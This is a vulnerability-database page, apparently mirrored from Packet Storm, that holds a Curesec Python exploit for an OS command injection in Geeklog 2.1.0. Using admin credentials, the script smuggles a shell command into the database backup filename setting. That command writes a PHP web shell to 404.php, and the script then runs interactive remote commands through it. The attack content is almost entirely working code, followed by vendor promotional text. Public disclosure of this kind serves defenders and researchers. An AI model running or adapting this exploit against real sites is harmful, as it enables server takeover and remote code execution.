Lucene search
K

Geeklog 2.1.0 Command Injection

🗓️ 09 Dec 2015 00:00:00Reported by Tim CoenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Geeklog 2.1.0 OS Command Injection exploit with Curesec GmbH detail

Code
`  
#!/usr/local/bin/python  
# Exploit for geeklog-2.1.0 OS Command Injection vulnerability  
# An admin account is required to use this exploit  
# Curesec GmbH  
  
import sys  
import re  
import argparse  
import requests # requires requests lib  
  
parser = argparse.ArgumentParser()  
parser.add_argument("url", help="base url to vulnerable site")  
parser.add_argument("username", help="admin username")  
parser.add_argument("password", help="admin password")  
args = parser.parse_args()  
  
url = args.url  
username = args.username  
password = args.password  
  
loginPath = "/admin/moderation.php"  
configPath = "/admin/configuration.php?tab-5"  
backupPath = "/admin/database.php"  
  
shellFileName = "404.php"  
shellContent = "<?php passthru(\$_GET['x']);"  
  
def login(requestSession, url, username, password):  
postData = {"mode": "login", "warn": "1", "loginname": username, "passwd": password}  
loginResult = requestSession.post(url, data = postData).text  
return "Incorrect Login Information" not in loginResult and "You have exceeded the number of allowed login attempts" not in loginResult  
  
def getCSRFToken(requestSession, url):  
csrfRequest = requestSession.get(url)  
csrfTokenRegEx = re.search('name="_glsectoken" value="(.*)" />', csrfRequest.text)  
return csrfTokenRegEx.group(1)  
  
def injectCommand(requestSession, url):  
csrfToken = getCSRFToken(requestSession, url)  
postData = {"_glsectoken": csrfToken, "conf_group": "Core", "sub_group": "0", "form_submit": "true", "mysqldump_filename_mask": 'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "' + shellContent + '" > ' + shellFileName + ';"'}  
requestSession.post(url, data = postData)  
  
def executeCommand(requestSession, url):  
csrfToken = getCSRFToken(requestSession, url)  
  
requestSession.get(url + "?mode=backup&_glsectoken=" + csrfToken)  
  
def runShell(url):  
print("enter command, or enter exit to quit.")  
command = raw_input("$ ")  
while "exit" not in command:  
print(requests.get(url + command).text)  
command = raw_input("$ ")  
  
requestSession = requests.session()  
  
if login(requestSession, url + loginPath, username, password):  
print("successful: login")  
else:  
exit("ERROR: could not log in")  
  
print("injecting command")  
injectCommand(requestSession, url + configPath)  
  
print("executing command")  
executeCommand(requestSession, url + backupPath)  
  
runShell(url + "/admin/" + shellFileName + "?x=")  
  
  
Blog Reference:  
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-Exploit-120.html  
  
--  
blog: https://blog.curesec.com  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Romain-Rolland-Str 14-24  
13089 Berlin, Germany  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation